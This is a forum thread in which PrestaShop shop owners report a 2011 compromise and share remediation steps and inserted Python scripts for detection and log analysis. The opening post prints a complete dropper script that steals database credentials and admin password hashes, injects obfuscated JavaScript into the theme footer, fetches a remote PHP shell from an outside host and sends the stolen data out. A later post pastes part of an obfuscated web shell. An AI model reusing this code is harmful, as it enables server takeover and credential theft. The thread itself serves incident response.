
Footer.tpl vulnerability?



Hi all,

 

I use an SCM system. I was just about to commit some files when I saw, in the "unversioned" list of files, a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a PHP editor, and here is the content:

 


<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=").
"{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "[email protected], [email protected]";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

 

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

 

Did someone hack into my computer and put this file there?

What do you think, guys?

 

I'm running an anti-virus check obviously as I write this...

Link to comment

Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for PrestaShop.

 

You should check your upload and download directories for PHP files that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new JavaScript at the end.

 

This file does send the usernames and passwords of employees. But that is useless; the passwords are hashed, so you cannot use them for login. But it also sends your database username and password. You might want to change them just in case. If your MySQL server is accessible externally, they will be able to log in.

Link to comment

Thanks.

 

I posted this on Reddit at:

 

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

 

The file was only run on my localhost, not on the live server.

Link to comment

The file was not placed on the live server, only on my local machine.

I'm running 1.4.3.0.

 

Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does.

 

The question is how it happened, and how we stop it from happening again.

Link to comment

I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.

 

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not come with PrestaShop already.

Link to comment

I just started using PrestaShop a few days ago to discover what it's all about. It works great, despite the hack today:

 

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).

* I can't find her.php on the server anymore (in the apache-log I can see it)

 

Is there any more information I can give to help find out what caused this?

 

* PrestaShop: 1.4.4.0

* Theme: Matrice

Link to comment

Hi Muller,

First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

 

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

 

-Mike

Link to comment

We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

 

-Mike

Link to comment

I've checked the Apache usage logs and couldn't find any IP address other than mine.

There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

 

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php

These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

 

Did it happen at the same time for everyone?

Link to comment
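The dropper in the first post names both shells `md5(date("r")).".php"`, so the file name encodes the server-clock second at which `her.php` ran, and the upload and download copies share one name when written in the same second. As an added example (not code from the thread; the function names are made up here), this Python code searches the seconds around an access-log timestamp, across UTC offsets, for the moment that produces a given name, which dates the drop even if the file's mtime has changed:

```python
import hashlib
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime


def php_date_r(dt):
    """Format an aware datetime like PHP's date("r"),
    e.g. 'Tue, 23 Aug 2011 17:44:21 +0200'."""
    return format_datetime(dt)


def shell_name(dt):
    """File name the dropper would pick if it ran at local time `dt`."""
    return hashlib.md5(php_date_r(dt).encode("ascii")).hexdigest() + ".php"


def recover_drop_time(filename, around, window_minutes=10):
    """Find the second, within +/- window_minutes of `around`, whose date("r")
    string hashes to `filename`. PHP's timezone may differ from the one Apache
    logs in, so every UTC offset from -12:00 to +14:00 (15-minute steps) is
    tried. Returns an aware datetime in PHP's offset, or None if no match."""
    target = filename.lower().rsplit(".", 1)[0]
    start = around.astimezone(timezone.utc) - timedelta(minutes=window_minutes)
    for sec in range(2 * window_minutes * 60 + 1):
        instant = start + timedelta(seconds=sec)
        for off in range(-12 * 60, 14 * 60 + 1, 15):
            local = instant.astimezone(timezone(timedelta(minutes=off)))
            digest = hashlib.md5(php_date_r(local).encode("ascii")).hexdigest()
            if digest == target:
                return local
    return None


if __name__ == "__main__":
    # Constructed case: PHP runs in UTC while Apache logs in +0200, and the
    # log entry is stamped one second before the file was written.
    ran_at = datetime(2011, 8, 23, 15, 44, 21, tzinfo=timezone.utc)
    name = shell_name(ran_at)
    logged = datetime(2011, 8, 23, 17, 44, 20,
                      tzinfo=timezone(timedelta(hours=2)))
    print(name, "->", recover_drop_time(name, logged))
```

A `None` result means the file was not named by this dropper inside the searched window, which is itself worth noting when several unexplained `.php` files are present.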

Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

 

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

Link to comment

Wow, this looks serious.

I discovered today that I have the same issue. I thought that I was the only one with a compromised PrestaShop installation, till I read this topic.

 

I'm running a 1.4.4 version, updated from 1.4.3

 

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

 

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

 

In my case, this happened right after I uploaded an HTML email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected, but seeing similar issues with others, I wonder if that's the case...

 

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

compromised.zip

Link to comment

For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your Apache raw access logs. You should be able to access them using your hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any PHP file under your uploads or downloads directory apart from index.php?

- Is there strange JavaScript at the end of your footer.tpl file?

 

If any of the above happens, change your MySQL username and password.

Link to comment
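The checks and the log extract requested in the post above can be scripted. This is an added Python example, not code from the thread or from PrestaShop; the function names, the `demo` theme and the sample tree and log lines are constructed for illustration, and the footer pattern follows the `{literal}<script>…</script>{/literal}</body>` shape that `her.php` writes.

```python
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Apache access-log timestamp, e.g. [23/Aug/2011:17:44:21 +0200]
LOG_TS = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
# her.php rewrites "</body>" as "{literal}<script>...</script>{/literal}</body>"
INJECTED = re.compile(
    r"\{literal\}\s*<script\b.*?</script>\s*\{/literal\}\s*</body>", re.S | re.I)


def scan_shop(root, theme):
    """Run the thread's checks; return a list of (indicator, relative path)."""
    root = Path(root)
    findings = []
    if (root / "modules" / "her.php").exists():
        findings.append(("dropper", "modules/her.php"))
    for d in ("upload", "download"):
        folder = root / d
        if not folder.is_dir():
            continue
        for p in sorted(folder.iterdir()):
            if p.suffix.lower() == ".php" and p.name != "index.php":
                findings.append(("unexpected-php", f"{d}/{p.name}"))
    # The dropper also deletes download/.htaccess (reported missing in the thread).
    if (root / "download").is_dir() and not (root / "download" / ".htaccess").exists():
        findings.append(("htaccess-missing", "download/.htaccess"))
    footer = root / "themes" / theme / "footer.tpl"
    # A match is a prompt for manual review: a theme may ship its own inline script.
    if footer.is_file() and INJECTED.search(footer.read_text(errors="replace")):
        findings.append(("footer-script", f"themes/{theme}/footer.tpl"))
    return findings


def log_window(lines, when, minutes=5):
    """Return the log lines stamped within +/- `minutes` of aware datetime `when`."""
    lo, hi = when - timedelta(minutes=minutes), when + timedelta(minutes=minutes)
    kept = []
    for line in lines:
        m = LOG_TS.search(line)
        if not m:
            continue  # not an access-log entry
        stamp = datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z")
        if lo <= stamp <= hi:
            kept.append(line)
    return kept


def make_constructed_shop(root, theme="demo"):
    """Build a small constructed tree in the state the thread describes:
    her.php already self-deleted, download/.htaccess gone, footer modified."""
    root = Path(root)
    for d in ("modules", "upload", "download", f"themes/{theme}"):
        (root / d).mkdir(parents=True)
    name = "0" * 32 + ".php"  # placeholder for the md5-named files
    for d in ("upload", "download"):
        (root / d / "index.php").write_text("<?php // stock placeholder\n")
        (root / d / name).write_text("placeholder\n")
    (root / "themes" / theme / "footer.tpl").write_text(
        "</div>\n   {literal}<script>/* placeholder */</script>{/literal}</body>\n</html>\n")
    return root


# Constructed log lines (documentation IP range); only the her.php request
# line mirrors the entry quoted earlier in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Aug/2011:17:38:02 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Aug/2011:17:41:50 +0200] "POST /admin/index.php HTTP/1.1" 200 812',
    '192.0.2.10 - - [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304',
    '192.0.2.10 - - [23/Aug/2011:17:52:09 +0200] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        shop = make_constructed_shop(Path(tmp) / "shop")
        for kind, path in scan_shop(shop, "demo"):
            print(f"{kind:18} {path}")
    seen = datetime(2011, 8, 23, 17, 44, 21, tzinfo=timezone(timedelta(hours=2)))
    print("\n".join(log_window(SAMPLE_LOG, seen)))
```

Because `her.php` deletes itself after running, an empty `dropper` result does not clear a shop; the other three indicators are the ones that persist.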

Ok, at least we can rule out the jbx_menu as the source of the problem...

 

Two more things.

 

First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders.

 

Second, I had a quick look at my downloaded PS 1.4.4 file (from the PrestaShop website) and found a .DS_Store file in the root folder. If my memory serves me well, this is a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning.

Link to comment

The .DS_Store is indeed from Mac and probably has nothing to do with the problem.

 

About her.php: The file is automatically deleted, the TS was lucky to see it in time...

 

Still: shouldn't you see every action in the Apache log files? Like the creation of her.php, I can't find this. Or do you need different log files for this? (I don't know much about those log files.)

Link to comment

Same problem in PrestaShop 1.4.4 with Matrice.

 

This code was added.

 

<?php 
if (isset($_GET['session2'])){
$auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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